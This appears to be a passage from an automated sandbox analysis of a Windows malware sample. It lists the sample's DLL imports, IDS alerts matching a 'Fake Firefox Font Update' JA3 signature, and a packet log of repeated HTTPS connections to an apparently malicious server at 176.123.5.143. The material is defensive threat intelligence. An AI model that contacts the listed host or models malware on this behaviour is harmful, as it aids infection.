                                                                            RT_GROUP_CURSOR0x1012780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_ICON0x10128c0x3edata0.8709677419354839
                                                                            DLLImport
                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                            kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExW, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                            kernel32.dllSleep
                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                            comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-23T07:37:40.359466+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049701176.123.5.143443TCP
                                                                            2024-12-23T07:37:43.690393+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049704176.123.5.143443TCP
                                                                            2024-12-23T07:37:47.061424+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049711176.123.5.143443TCP
                                                                            2024-12-23T07:37:50.554677+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049723176.123.5.143443TCP
                                                                            2024-12-23T07:37:54.406026+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049735176.123.5.143443TCP
                                                                            2024-12-23T07:37:57.893612+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049744176.123.5.143443TCP
                                                                            2024-12-23T07:38:01.333205+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049756176.123.5.143443TCP
                                                                            2024-12-23T07:38:04.743917+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049763176.123.5.143443TCP
                                                                            2024-12-23T07:38:08.112094+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049775176.123.5.143443TCP
                                                                            2024-12-23T07:38:11.485345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049786176.123.5.143443TCP
                                                                            2024-12-23T07:38:14.889619+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049794176.123.5.143443TCP
                                                                            2024-12-23T07:38:18.261307+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049805176.123.5.143443TCP
                                                                            2024-12-23T07:38:21.649788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049813176.123.5.143443TCP
                                                                            2024-12-23T07:38:25.149958+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049825176.123.5.143443TCP
                                                                            2024-12-23T07:38:28.698981+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049833176.123.5.143443TCP
                                                                            2024-12-23T07:38:32.191400+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049844176.123.5.143443TCP
                                                                            2024-12-23T07:38:35.587388+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049855176.123.5.143443TCP
                                                                            2024-12-23T07:38:38.998362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049864176.123.5.143443TCP
                                                                            2024-12-23T07:38:42.500005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049875176.123.5.143443TCP
                                                                            2024-12-23T07:38:46.128701+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049883176.123.5.143443TCP
                                                                            2024-12-23T07:38:49.522196+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049894176.123.5.143443TCP
                                                                            2024-12-23T07:38:52.969121+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049904176.123.5.143443TCP
                                                                            2024-12-23T07:38:56.370320+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049913176.123.5.143443TCP
                                                                            2024-12-23T07:38:59.775032+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049924176.123.5.143443TCP
                                                                            2024-12-23T07:39:03.297310+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049932176.123.5.143443TCP
                                                                            2024-12-23T07:39:06.717185+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049944176.123.5.143443TCP
                                                                            2024-12-23T07:39:10.119202+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049951176.123.5.143443TCP
                                                                            2024-12-23T07:39:13.652984+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049963176.123.5.143443TCP
                                                                            2024-12-23T07:39:17.179009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049973176.123.5.143443TCP
                                                                            2024-12-23T07:39:20.613727+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049982176.123.5.143443TCP
                                                                            2024-12-23T07:39:24.058034+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049994176.123.5.143443TCP
                                                                            2024-12-23T07:39:27.700295+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050001176.123.5.143443TCP
                                                                            2024-12-23T07:39:31.110620+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050012176.123.5.143443TCP
                                                                            2024-12-23T07:39:34.510112+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050023176.123.5.143443TCP
                                                                            2024-12-23T07:39:38.189131+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050031176.123.5.143443TCP
                                                                            2024-12-23T07:39:41.818166+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050042176.123.5.143443TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 23, 2024 07:37:38.477811098 CET49700443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:38.477869987 CET44349700176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:38.477945089 CET49700443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:38.525310993 CET49700443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:38.525412083 CET44349700176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:38.525511980 CET49700443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:38.891555071 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:38.891613007 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:38.891689062 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:38.894292116 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:38.894305944 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:40.359385014 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:40.359466076 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:40.364554882 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:40.364573002 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:40.364917994 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:40.409612894 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:40.419544935 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:40.467333078 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.702220917 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.702244997 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.702254057 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.702266932 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.702286005 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.702341080 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.702421904 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.702467918 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.702491045 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.810453892 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.810488939 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.810556889 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.810590982 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.810638905 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.810659885 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.899900913 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.899920940 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.900027037 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.900075912 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.900139093 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.966953993 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.967030048 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.967044115 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.967089891 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.968036890 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.968055010 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:41.968107939 CET49701443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:41.968113899 CET44349701176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:42.183553934 CET49703443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:42.183655977 CET44349703176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:42.183778048 CET49703443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:42.183911085 CET49703443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:42.183999062 CET44349703176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:42.185833931 CET49703443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:42.229074955 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:42.229121923 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:42.229212999 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:42.229542017 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:42.229561090 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:43.690294027 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:43.690392971 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:43.691996098 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:43.692018032 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:43.692256927 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:43.693552971 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:43.739341021 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.078344107 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.078381062 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.078401089 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.078459978 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.078474998 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.078505039 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.078528881 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.192966938 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.193011045 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.193109035 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.193134069 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.193157911 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.193188906 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.274445057 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.274477005 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.274661064 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.274682045 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.274758101 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.344948053 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.345048904 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.345096111 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.345122099 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.345382929 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.345401049 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.345427036 CET49704443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.345432997 CET44349704176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.548414946 CET49710443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.548460960 CET44349710176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.548587084 CET49710443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.548717022 CET49710443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.548830032 CET44349710176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.548990965 CET49710443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.601684093 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.601731062 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:45.601839066 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.602116108 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:45.602129936 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:47.061327934 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:47.061424017 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:47.062736034 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:47.062748909 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:47.063064098 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:47.064277887 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:47.107326031 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.495307922 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.495357037 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.495377064 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.495467901 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.495496035 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.495565891 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.608656883 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.608706951 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.608844995 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.608876944 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.608932018 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.691715956 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.691751003 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.691871881 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.691900969 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.691956043 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.766021967 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.766102076 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.766124010 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.766145945 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.766204119 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.766423941 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.766446114 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:48.766460896 CET49711443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:48.766469002 CET44349711176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:49.033857107 CET49722443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:49.033922911 CET44349722176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:49.034006119 CET49722443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:49.034198046 CET49722443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:49.034254074 CET44349722176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:49.034312963 CET49722443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:49.093740940 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:49.093796968 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:49.093883991 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:49.094423056 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:49.094439983 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:50.554600954 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:50.554677010 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:50.557179928 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:50.557189941 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:50.557511091 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:50.559272051 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:50.603322029 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.038594007 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.038650990 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.038683891 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.038719893 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.038743019 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.038774014 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.039237022 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.149441004 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.149481058 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.149538994 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.149557114 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.149607897 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.149650097 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.234515905 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.234554052 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.234697104 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.234697104 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.234721899 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.234766006 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.306843996 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.306927919 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.306953907 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.306982040 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.307029009 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.307641029 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.307657957 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.307672977 CET49723443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.307679892 CET44349723176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.549004078 CET49729443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.549062014 CET44349729176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.549153090 CET49729443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.560111046 CET49729443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.560168028 CET44349729176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.560226917 CET49729443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.946989059 CET49735443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.947058916 CET44349735176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:52.947129011 CET49735443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.948242903 CET49735443192.168.2.10176.123.5.143
                                                                            Dec 23, 2024 07:37:52.948261023 CET44349735176.123.5.143192.168.2.10
                                                                            Dec 23, 2024 07:37:54.405914068 CET44349735176.123.5.143192.168.2.10
